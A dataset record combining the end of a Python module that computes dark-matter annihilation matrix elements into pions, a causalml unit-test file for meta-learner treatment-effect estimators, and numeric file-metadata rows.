+ MDot(k, p3)
+ MDot(p1, p2)
+ MDot(p1, p3)
+ MDot(p2, p3)
)
)
)
beta1 = (
-2
* beta
* gpxx ** 2
* qe ** 2
* (
-(b0 * fpi * gpGG * mdq)
+ b0 * fpi * gpGG * muq
- b0 * fpi * gpdd * vh
+ b0 * fpi * gpuu * vh
)
* (
mpi ** 2 * MDot(k, p1) ** 2
+ mpi ** 2 * MDot(k, p2) ** 2
- 2 * MDot(k, p1) * MDot(k, p2) * MDot(p1, p2)
)
* (
b0 * mdq * vh
+ 2 * mpi ** 2 * vh
- 2 * mpi0 ** 2 * vh
+ b0 * muq * vh
+ 4 * vh * MDot(k, p1)
+ 4 * vh * MDot(k, p2)
- 2 * vh * MDot(k, p3)
+ 4 * vh * MDot(p1, p2)
- 2 * vh * MDot(p1, p3)
- 2 * vh * MDot(p2, p3)
)
* (mx ** 2 + MDot(px, pxbar))
) / (
9.0
* fpi ** 4
* vh ** 2
* MDot(k, p1) ** 2
* MDot(k, p2) ** 2
* (
(-mp ** 2 + 2 * mpi ** 2 + mpi0 ** 2) ** 2
+ mp ** 2 * widthp ** 2
- 4
* (
mp ** 2
- 2 * mpi ** 2
- mpi0 ** 2
- MDot(k, p1)
- MDot(k, p2)
- MDot(k, p3)
- MDot(p1, p2)
- MDot(p1, p3)
- MDot(p2, p3)
)
* (
MDot(k, p1)
+ MDot(k, p2)
+ MDot(k, p3)
+ MDot(p1, p2)
+ MDot(p1, p3)
+ MDot(p2, p3)
)
)
)
beta2 = (
beta ** 2
* gpxx ** 2
* qe ** 2
* (
mpi ** 2 * MDot(k, p1) ** 2
+ mpi ** 2 * MDot(k, p2) ** 2
- 2 * MDot(k, p1) * MDot(k, p2) * MDot(p1, p2)
)
* (
-2
* (
2 * b0 * fpi * gpGG * mdq
- 2 * b0 * fpi * gpGG * muq
+ 2 * b0 * fpi * gpdd * vh
- 2 * b0 * fpi * gpuu * vh
)
* (
-(b0 * fpi * gpGG * mdq)
+ b0 * fpi * gpGG * muq
- b0 * fpi * gpdd * vh
+ b0 * fpi * gpuu * vh
)
+ (
-(b0 * fpi * gpGG * mdq)
+ b0 * fpi * gpGG * muq
- b0 * fpi * gpdd * vh
+ b0 * fpi * gpuu * vh
)
** 2
- (
b0 * mdq * vh
+ 2 * mpi ** 2 * vh
- 2 * mpi0 ** 2 * vh
+ b0 * muq * vh
+ 4 * vh * MDot(k, p1)
+ 4 * vh * MDot(k, p2)
- 2 * vh * MDot(k, p3)
+ 4 * vh * MDot(p1, p2)
- 2 * vh * MDot(p1, p3)
- 2 * vh * MDot(p2, p3)
)
** 2
)
* (mx ** 2 + MDot(px, pxbar))
) / (
9.0
* fpi ** 4
* vh ** 2
* MDot(k, p1) ** 2
* MDot(k, p2) ** 2
* (
(-mp ** 2 + 2 * mpi ** 2 + mpi0 ** 2) ** 2
+ mp ** 2 * widthp ** 2
- 4
* (
mp ** 2
- 2 * mpi ** 2
- mpi0 ** 2
- MDot(k, p1)
- MDot(k, p2)
- MDot(k, p3)
- MDot(p1, p2)
- MDot(p1, p3)
- MDot(p2, p3)
)
* (
MDot(k, p1)
+ MDot(k, p2)
+ MDot(k, p3)
+ MDot(p1, p2)
+ MDot(p1, p3)
+ MDot(p2, p3)
)
)
)
return beta0 + beta1 + beta2
def msqrd_xx_to_p_to_000(self, momenta):
"""
Returns the squared matrix element for dark matter annihilating into
three neutral pions through a scalar mediator. This function is used
for RAMBO.
Parameters
----------
momenta : numpy.array
List of momenta of the final state particles, the three netural
pions.
self : PseudoScalarMediatorParameters or PseudoScalarMediator object
Parameter object for the pseudo-scalar mediator theory.
Returns
-------
msqrd : float
The squared matrix element for a given set of momenta.
"""
mx = self.mx
mp = self.mp
gpxx = self.gpxx
gpuu = self.gpuu
gpdd = self.gpdd
gpGG = self.gpGG
beta = self.beta
widthp = self.width_p
p1 = momenta[0]
p2 = momenta[1]
p3 = momenta[2]
P = sum(momenta)
pxmag = np.sqrt(P[0] ** 2 / 4.0 - mx ** 2)
px = np.array([P[0] / 2.0, 0.0, 0.0, pxmag])
pxbar = np.array([P[0] / 2.0, 0.0, 0.0, -pxmag])
beta0 = (
b0 ** 2
* gpxx ** 2
* (fpi * gpGG * mdq - fpi * gpGG * muq + fpi * gpdd * vh - fpi * gpuu * vh)
** 2
* (mx ** 2 + MDot(px, pxbar))
) / (
fpi ** 4
* vh ** 2
* (
(mp ** 2 - 3 * mpi0 ** 2) ** 2
+ mp ** 2 * widthp ** 2
- 4
* (mp ** 2 - 3 * mpi0 ** 2 - MDot(p1, p2) - MDot(p1, p3) - MDot(p2, p3))
* (MDot(p1, p2) + MDot(p1, p3) + MDot(p2, p3))
)
)
beta1 = (
-2
* b0 ** 2
* beta
* gpxx ** 2
* (fpi * gpGG * mdq - fpi * gpGG * muq + fpi * gpdd * vh - fpi * gpuu * vh)
* (mdq * vh + muq * vh)
* (mx ** 2 + MDot(px, pxbar))
) / (
fpi ** 4
* vh ** 2
* (
(mp ** 2 - 3 * mpi0 ** 2) ** 2
+ mp ** 2 * widthp ** 2
- 4
* (mp ** 2 - 3 * mpi0 ** 2 - MDot(p1, p2) - MDot(p1, p3) - MDot(p2, p3))
* (MDot(p1, p2) + MDot(p1, p3) + MDot(p2, p3))
)
)
beta2 = (
b0 ** 2
* beta ** 2
* gpxx ** 2
* (
-3
* (
fpi * gpGG * mdq
- fpi * gpGG * muq
+ fpi * gpdd * vh
- fpi * gpuu * vh
)
** 2
+ 2
* (
fpi * gpGG * mdq
- fpi * gpGG * muq
+ fpi * gpdd * vh
- fpi * gpuu * vh
)
* (
-4 * fpi * gpGG * mdq
+ 4 * fpi * gpGG * muq
- 4 * fpi * gpdd * vh
+ 4 * fpi * gpuu * vh
)
+ (-(mdq * vh) - muq * vh) ** 2
)
* (mx ** 2 + MDot(px, pxbar))
) / (
fpi ** 4
* vh ** 2
* (
(mp ** 2 - 3 * mpi0 ** 2) ** 2
+ mp ** 2 * widthp ** 2
- 4
* (mp ** 2 - 3 * mpi0 ** 2 - MDot(p1, p2) - MDot(p1, p3) - MDot(p2, p3))
* (MDot(p1, p2) + MDot(p1, p3) + MDot(p2, p3))
)
)
msqrd = beta0 + beta1 + beta2
return msqrd
| 29.824953
| 88
| 0.309191
| 1,601
| 16,016
| 3.073704
| 0.073704
| 0.057305
| 0.040642
| 0.043894
| 0.888844
| 0.880919
| 0.871774
| 0.855314
| 0.855314
| 0.855314
| 0
| 0.087688
| 0.573489
| 16,016
| 536
| 89
| 29.880597
| 0.632704
| 0.111701
| 0
| 0.828829
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006757
| false
| 0
| 0.015766
| 0
| 0.031532
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4dc6eb289c66675b7794288a953e6bdd0abc9d87
| 27,641
|
py
|
Python
|
tests/test_meta_learners.py
|
lleiou/causalml
|
2d3cacacad5ed3b0e57b593803a33c61c554f3b2
|
[
"Apache-2.0"
] | 1
|
2021-03-22T20:09:18.000Z
|
2021-03-22T20:09:18.000Z
|
tests/test_meta_learners.py
|
lleiou/causalml
|
2d3cacacad5ed3b0e57b593803a33c61c554f3b2
|
[
"Apache-2.0"
] | null | null | null |
tests/test_meta_learners.py
|
lleiou/causalml
|
2d3cacacad5ed3b0e57b593803a33c61c554f3b2
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import pandas as pd
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from xgboost import XGBRegressor
from xgboost import XGBClassifier
from causalml.dataset import synthetic_data
from causalml.inference.meta import BaseSLearner, BaseSRegressor, BaseSClassifier, LRSRegressor
from causalml.inference.meta import BaseTLearner, BaseTRegressor, BaseTClassifier, XGBTRegressor, MLPTRegressor
from causalml.inference.meta import BaseXLearner, BaseXClassifier, BaseXRegressor
from causalml.inference.meta import BaseRLearner, BaseRClassifier, BaseRRegressor
from causalml.inference.meta import TMLELearner
from causalml.inference.meta import BaseDRLearner
from causalml.metrics import ape, get_cumgain
from .const import RANDOM_SEED, N_SAMPLE, ERROR_THRESHOLD, CONTROL_NAME, CONVERSION
def test_synthetic_data():
y, X, treatment, tau, b, e = synthetic_data(mode=1, n=N_SAMPLE, p=8, sigma=.1)
assert (y.shape[0] == X.shape[0] and y.shape[0] == treatment.shape[0] and
y.shape[0] == tau.shape[0] and y.shape[0] == b.shape[0] and
y.shape[0] == e.shape[0])
y, X, treatment, tau, b, e = synthetic_data(mode=2, n=N_SAMPLE, p=8, sigma=.1)
assert (y.shape[0] == X.shape[0] and y.shape[0] == treatment.shape[0] and
y.shape[0] == tau.shape[0] and y.shape[0] == b.shape[0] and
y.shape[0] == e.shape[0])
y, X, treatment, tau, b, e = synthetic_data(mode=3, n=N_SAMPLE, p=8, sigma=.1)
assert (y.shape[0] == X.shape[0] and y.shape[0] == treatment.shape[0] and
y.shape[0] == tau.shape[0] and y.shape[0] == b.shape[0] and
y.shape[0] == e.shape[0])
y, X, treatment, tau, b, e = synthetic_data(mode=4, n=N_SAMPLE, p=8, sigma=.1)
assert (y.shape[0] == X.shape[0] and y.shape[0] == treatment.shape[0] and
y.shape[0] == tau.shape[0] and y.shape[0] == b.shape[0] and
y.shape[0] == e.shape[0])
def test_BaseSLearner(generate_regression_data):
y, X, treatment, tau, b, e = generate_regression_data()
learner = BaseSLearner(learner=LinearRegression())
# check the accuracy of the ATE estimation
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y, return_ci=True)
assert (ate_p >= lb) and (ate_p <= ub)
assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD
def test_BaseSRegressor(generate_regression_data):
y, X, treatment, tau, b, e = generate_regression_data()
learner = BaseSRegressor(learner=XGBRegressor())
# check the accuracy of the ATE estimation
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)
assert (ate_p >= lb) and (ate_p <= ub)
assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD
# check the accuracy of the CATE estimation with the bootstrap CI
cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)
auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
'W': treatment,
'y': y,
'treatment_effect_col': tau})
cumgain = get_cumgain(auuc_metrics,
outcome_col='y',
treatment_col='W',
treatment_effect_col='tau')
# Check if the cumulative gain when using the model's prediction is
# higher than it would be under random targeting
assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_LRSRegressor(generate_regression_data):
y, X, treatment, tau, b, e = generate_regression_data()
learner = LRSRegressor()
# check the accuracy of the ATE estimation
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y)
assert (ate_p >= lb) and (ate_p <= ub)
assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD
def test_BaseTLearner(generate_regression_data):
y, X, treatment, tau, b, e = generate_regression_data()
learner = BaseTLearner(learner=XGBRegressor())
# check the accuracy of the ATE estimation
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y)
assert (ate_p >= lb) and (ate_p <= ub)
assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD
# check the accuracy of the CATE estimation with the bootstrap CI
cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)
auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
'W': treatment,
'y': y,
'treatment_effect_col': tau})
cumgain = get_cumgain(auuc_metrics,
outcome_col='y',
treatment_col='W',
treatment_effect_col='tau')
# Check if the cumulative gain when using the model's prediction is
# higher than it would be under random targeting
assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_BaseTRegressor(generate_regression_data):
y, X, treatment, tau, b, e = generate_regression_data()
learner = BaseTRegressor(learner=XGBRegressor())
# check the accuracy of the ATE estimation
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y)
assert (ate_p >= lb) and (ate_p <= ub)
assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD
# check the accuracy of the CATE estimation with the bootstrap CI
cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)
auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
'W': treatment,
'y': y,
'treatment_effect_col': tau})
cumgain = get_cumgain(auuc_metrics,
outcome_col='y',
treatment_col='W',
treatment_effect_col='tau')
# Check if the cumulative gain when using the model's prediction is
# higher than it would be under random targeting
assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_MLPTRegressor(generate_regression_data):
y, X, treatment, tau, b, e = generate_regression_data()
learner = MLPTRegressor()
# check the accuracy of the ATE estimation
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y)
assert (ate_p >= lb) and (ate_p <= ub)
assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD
# check the accuracy of the CATE estimation with the bootstrap CI
cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)
auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
'W': treatment,
'y': y,
'treatment_effect_col': tau})
cumgain = get_cumgain(auuc_metrics,
outcome_col='y',
treatment_col='W',
treatment_effect_col='tau')
# Check if the cumulative gain when using the model's prediction is
# higher than it would be under random targeting
assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_XGBTRegressor(generate_regression_data):
y, X, treatment, tau, b, e = generate_regression_data()
learner = XGBTRegressor()
# check the accuracy of the ATE estimation
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y)
assert (ate_p >= lb) and (ate_p <= ub)
assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD
# check the accuracy of the CATE estimation with the bootstrap CI
cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)
auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
'W': treatment,
'y': y,
'treatment_effect_col': tau})
cumgain = get_cumgain(auuc_metrics,
outcome_col='y',
treatment_col='W',
treatment_effect_col='tau')
# Check if the cumulative gain when using the model's prediction is
# higher than it would be under random targeting
assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_BaseXLearner(generate_regression_data):
y, X, treatment, tau, b, e = generate_regression_data()
learner = BaseXLearner(learner=XGBRegressor())
# check the accuracy of the ATE estimation
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y, p=e)
assert (ate_p >= lb) and (ate_p <= ub)
assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD
# check the accuracy of the CATE estimation with the bootstrap CI
cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, p=e, return_ci=True, n_bootstraps=10)
auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
'W': treatment,
'y': y,
'treatment_effect_col': tau})
cumgain = get_cumgain(auuc_metrics,
outcome_col='y',
treatment_col='W',
treatment_effect_col='tau')
# Check if the cumulative gain when using the model's prediction is
# higher than it would be under random targeting
assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_BaseXRegressor(generate_regression_data):
y, X, treatment, tau, b, e = generate_regression_data()
learner = BaseXRegressor(learner=XGBRegressor())
# check the accuracy of the ATE estimation
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y, p=e)
assert (ate_p >= lb) and (ate_p <= ub)
assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD
# check the accuracy of the CATE estimation with the bootstrap CI
cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, p=e, return_ci=True, n_bootstraps=10)
auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
'W': treatment,
'y': y,
'treatment_effect_col': tau})
cumgain = get_cumgain(auuc_metrics,
outcome_col='y',
treatment_col='W',
treatment_effect_col='tau')
# Check if the cumulative gain when using the model's prediction is
# higher than it would be under random targeting
assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_BaseXLearner_without_p(generate_regression_data):
y, X, treatment, tau, b, e = generate_regression_data()
learner = BaseXLearner(learner=XGBRegressor())
# check the accuracy of the ATE estimation
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y)
assert (ate_p >= lb) and (ate_p <= ub)
assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD
# check the accuracy of the CATE estimation with the bootstrap CI
cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)
auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
'W': treatment,
'y': y,
'treatment_effect_col': tau})
cumgain = get_cumgain(auuc_metrics,
outcome_col='y',
treatment_col='W',
treatment_effect_col='tau')
# Check if the cumulative gain when using the model's prediction is
# higher than it would be under random targeting
assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_BaseXRegressor_without_p(generate_regression_data):
y, X, treatment, tau, b, e = generate_regression_data()
learner = BaseXRegressor(learner=XGBRegressor())
# check the accuracy of the ATE estimation
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y)
assert (ate_p >= lb) and (ate_p <= ub)
assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD
# check the accuracy of the CATE estimation with the bootstrap CI
cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)
auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
'W': treatment,
'y': y,
'treatment_effect_col': tau})
cumgain = get_cumgain(auuc_metrics,
outcome_col='y',
treatment_col='W',
treatment_effect_col='tau')
# Check if the cumulative gain when using the model's prediction is
# higher than it would be under random targeting
assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_BaseRLearner(generate_regression_data):
y, X, treatment, tau, b, e = generate_regression_data()
learner = BaseRLearner(learner=XGBRegressor())
# check the accuracy of the ATE estimation
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y, p=e)
assert (ate_p >= lb) and (ate_p <= ub)
assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD
# check the accuracy of the CATE estimation with the bootstrap CI
cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, p=e, return_ci=True, n_bootstraps=10)
auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
'W': treatment,
'y': y,
'treatment_effect_col': tau})
cumgain = get_cumgain(auuc_metrics,
outcome_col='y',
treatment_col='W',
treatment_effect_col='tau')
# Check if the cumulative gain when using the model's prediction is
# higher than it would be under random targeting
assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_BaseRRegressor(generate_regression_data):
y, X, treatment, tau, b, e = generate_regression_data()
learner = BaseRRegressor(learner=XGBRegressor())
# check the accuracy of the ATE estimation
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y, p=e)
assert (ate_p >= lb) and (ate_p <= ub)
assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD
# check the accuracy of the CATE estimation with the bootstrap CI
cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, p=e, return_ci=True, n_bootstraps=10)
auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
'W': treatment,
'y': y,
'treatment_effect_col': tau})
cumgain = get_cumgain(auuc_metrics,
outcome_col='y',
treatment_col='W',
treatment_effect_col='tau')
# Check if the cumulative gain when using the model's prediction is
# higher than it would be under random targeting
assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_BaseRLearner_without_p(generate_regression_data):
y, X, treatment, tau, b, e = generate_regression_data()
learner = BaseRLearner(learner=XGBRegressor())
# check the accuracy of the ATE estimation
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y)
assert (ate_p >= lb) and (ate_p <= ub)
assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD
# check the accuracy of the CATE estimation with the bootstrap CI
cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)
auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
'W': treatment,
'y': y,
'treatment_effect_col': tau})
cumgain = get_cumgain(auuc_metrics,
outcome_col='y',
treatment_col='W',
treatment_effect_col='tau')
# Check if the cumulative gain when using the model's prediction is
# higher than it would be under random targeting
assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_BaseRRegressor_without_p(generate_regression_data):
y, X, treatment, tau, b, e = generate_regression_data()
learner = BaseRRegressor(learner=XGBRegressor())
# check the accuracy of the ATE estimation
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y)
assert (ate_p >= lb) and (ate_p <= ub)
assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD
# check the accuracy of the CATE estimation with the bootstrap CI
cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, return_ci=True, n_bootstraps=10)
auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
'W': treatment,
'y': y,
'treatment_effect_col': tau})
cumgain = get_cumgain(auuc_metrics,
outcome_col='y',
treatment_col='W',
treatment_effect_col='tau')
# Check if the cumulative gain when using the model's prediction is
# higher than it would be under random targeting
assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
def test_TMLELearner(generate_regression_data):
y, X, treatment, tau, b, e = generate_regression_data()
learner = TMLELearner(learner=XGBRegressor())
# check the accuracy of the ATE estimation
ate_p, lb, ub = learner.estimate_ate(X=X, p=e, treatment=treatment, y=y)
assert (ate_p >= lb) and (ate_p <= ub)
assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD
def test_BaseSClassifier(generate_classification_data):
np.random.seed(RANDOM_SEED)
df, x_names = generate_classification_data()
df['treatment_group_key'] = np.where(df['treatment_group_key'] == CONTROL_NAME, 0, 1)
df_train, df_test = train_test_split(df,
test_size=0.2,
random_state=RANDOM_SEED)
uplift_model = BaseSClassifier(learner=XGBClassifier())
uplift_model.fit(X=df_train[x_names].values,
treatment=df_train['treatment_group_key'].values,
y=df_train[CONVERSION].values)
tau_pred = uplift_model.predict(X=df_test[x_names].values,
treatment=df_test['treatment_group_key'].values)
auuc_metrics = pd.DataFrame({'tau_pred': tau_pred.flatten(),
'W': df_test['treatment_group_key'].values,
CONVERSION: df_test[CONVERSION].values,
'treatment_effect_col': df_test['treatment_effect'].values})
cumgain = get_cumgain(auuc_metrics,
outcome_col=CONVERSION,
treatment_col='W',
treatment_effect_col='treatment_effect_col')
# Check if the cumulative gain when using the model's prediction is
# higher than it would be under random targeting
assert cumgain['tau_pred'].sum() > cumgain['Random'].sum()
def test_BaseTClassifier(generate_classification_data):
np.random.seed(RANDOM_SEED)
df, x_names = generate_classification_data()
df['treatment_group_key'] = np.where(df['treatment_group_key'] == CONTROL_NAME, 0, 1)
df_train, df_test = train_test_split(df,
test_size=0.2,
random_state=RANDOM_SEED)
uplift_model = BaseTClassifier(learner=LogisticRegression())
uplift_model.fit(X=df_train[x_names].values,
treatment=df_train['treatment_group_key'].values,
y=df_train[CONVERSION].values)
tau_pred = uplift_model.predict(X=df_test[x_names].values,
treatment=df_test['treatment_group_key'].values)
auuc_metrics = pd.DataFrame({'tau_pred': tau_pred.flatten(),
'W': df_test['treatment_group_key'].values,
CONVERSION: df_test[CONVERSION].values,
'treatment_effect_col': df_test['treatment_effect'].values})
cumgain = get_cumgain(auuc_metrics,
outcome_col=CONVERSION,
treatment_col='W',
treatment_effect_col='treatment_effect_col')
# Check if the cumulative gain when using the model's prediction is
# higher than it would be under random targeting
assert cumgain['tau_pred'].sum() > cumgain['Random'].sum()
def test_BaseXClassifier(generate_classification_data):
np.random.seed(RANDOM_SEED)
df, x_names = generate_classification_data()
df['treatment_group_key'] = np.where(df['treatment_group_key'] == CONTROL_NAME, 0, 1)
propensity_model = LogisticRegression()
propensity_model.fit(X=df[x_names].values, y=df['treatment_group_key'].values)
df['propensity_score'] = propensity_model.predict_proba(df[x_names].values)[:, 1]
df_train, df_test = train_test_split(df,
test_size=0.2,
random_state=RANDOM_SEED)
# specify all 4 learners
uplift_model = BaseXClassifier(control_outcome_learner=XGBClassifier(),
control_effect_learner=XGBRegressor(),
treatment_outcome_learner=XGBClassifier(),
treatment_effect_learner=XGBRegressor())
uplift_model.fit(X=df_train[x_names].values,
treatment=df_train['treatment_group_key'].values,
y=df_train[CONVERSION].values)
tau_pred = uplift_model.predict(X=df_test[x_names].values,
p=df_test['propensity_score'].values)
# specify 2 learners
uplift_model = BaseXClassifier(outcome_learner=XGBClassifier(),
effect_learner=XGBRegressor())
uplift_model.fit(X=df_train[x_names].values,
treatment=df_train['treatment_group_key'].values,
y=df_train[CONVERSION].values)
tau_pred = uplift_model.predict(X=df_test[x_names].values,
p=df_test['propensity_score'].values)
# calculate metrics
auuc_metrics = pd.DataFrame({'tau_pred': tau_pred.flatten(),
'W': df_test['treatment_group_key'].values,
CONVERSION: df_test[CONVERSION].values,
'treatment_effect_col': df_test['treatment_effect'].values})
cumgain = get_cumgain(auuc_metrics,
outcome_col=CONVERSION,
treatment_col='W',
treatment_effect_col='treatment_effect_col')
# Check if the cumulative gain when using the model's prediction is
# higher than it would be under random targeting
assert cumgain['tau_pred'].sum() > cumgain['Random'].sum()
def test_BaseRClassifier(generate_classification_data):
np.random.seed(RANDOM_SEED)
df, x_names = generate_classification_data()
df['treatment_group_key'] = np.where(df['treatment_group_key'] == CONTROL_NAME, 0, 1)
propensity_model = LogisticRegression()
propensity_model.fit(X=df[x_names].values, y=df['treatment_group_key'].values)
df['propensity_score'] = propensity_model.predict_proba(df[x_names].values)[:, 1]
df_train, df_test = train_test_split(df,
test_size=0.2,
random_state=RANDOM_SEED)
uplift_model = BaseRClassifier(outcome_learner=XGBClassifier(),
effect_learner=XGBRegressor())
uplift_model.fit(X=df_train[x_names].values,
p=df_train['propensity_score'].values,
treatment=df_train['treatment_group_key'].values,
y=df_train[CONVERSION].values)
tau_pred = uplift_model.predict(X=df_test[x_names].values)
auuc_metrics = pd.DataFrame({'tau_pred': tau_pred.flatten(),
'W': df_test['treatment_group_key'].values,
CONVERSION: df_test[CONVERSION].values,
'treatment_effect_col': df_test['treatment_effect'].values})
cumgain = get_cumgain(auuc_metrics,
outcome_col=CONVERSION,
treatment_col='W',
treatment_effect_col='treatment_effect_col')
# Check if the cumulative gain when using the model's prediction is
# higher than it would be under random targeting
assert cumgain['tau_pred'].sum() > cumgain['Random'].sum()
def test_pandas_input(generate_regression_data):
y, X, treatment, tau, b, e = generate_regression_data()
# convert to pandas types
y = pd.Series(y)
X = pd.DataFrame(X)
treatment = pd.Series(treatment)
try:
learner = BaseSLearner(learner=LinearRegression())
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y, return_ci=True)
except AttributeError:
assert False
try:
learner = BaseTLearner(learner=LinearRegression())
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y)
except AttributeError:
assert False
try:
learner = BaseXLearner(learner=LinearRegression())
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y, p=e)
except AttributeError:
assert False
try:
learner = BaseRLearner(learner=LinearRegression())
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y, p=e)
except AttributeError:
assert False
try:
learner = TMLELearner(learner=LinearRegression())
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y, p=e)
except AttributeError:
assert False
def test_BaseDRLearner(generate_regression_data):
y, X, treatment, tau, b, e = generate_regression_data()
learner = BaseDRLearner(learner=XGBRegressor(), treatment_effect_learner=LinearRegression())
# check the accuracy of the ATE estimation
ate_p, lb, ub = learner.estimate_ate(X=X, treatment=treatment, y=y, p=e)
assert (ate_p >= lb) and (ate_p <= ub)
assert ape(tau.mean(), ate_p) < ERROR_THRESHOLD
# check the accuracy of the CATE estimation with the bootstrap CI
cate_p, _, _ = learner.fit_predict(X=X, treatment=treatment, y=y, p=e, return_ci=True, n_bootstraps=10)
auuc_metrics = pd.DataFrame({'cate_p': cate_p.flatten(),
'W': treatment,
'y': y,
'treatment_effect_col': tau})
cumgain = get_cumgain(auuc_metrics,
outcome_col='y',
treatment_col='W',
treatment_effect_col='tau')
# Check if the cumulative gain when using the model's prediction is
# higher than it would be under random targeting
assert cumgain['cate_p'].sum() > cumgain['Random'].sum()
| 41.071322
| 111
| 0.61293
| 3,465
| 27,641
| 4.673593
| 0.043001
| 0.018031
| 0.033963
| 0.044461
| 0.915463
| 0.900333
| 0.89527
| 0.895023
| 0.895023
| 0.892985
| 0
| 0.005145
| 0.282732
| 27,641
| 672
| 112
| 41.13244
| 0.811661
| 0.134221
| 0
| 0.829268
| 0
| 0
| 0.059894
| 0
| 0
| 0
| 0
| 0
| 0.14878
| 1
| 0.056098
| false
| 0
| 0.039024
| 0
| 0.095122
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4deaa8ea32633490934f75618441c7732c737f9a
| 129
|
py
|
Python
|
federatedscope/core/proto/__init__.py
|
alibaba/FederatedScope
|
fcf6d237624769ea094cfd68803901622f14fc23
|
[
"Apache-2.0"
] | 9
|
2022-03-24T07:59:37.000Z
|
2022-03-31T06:47:52.000Z
|
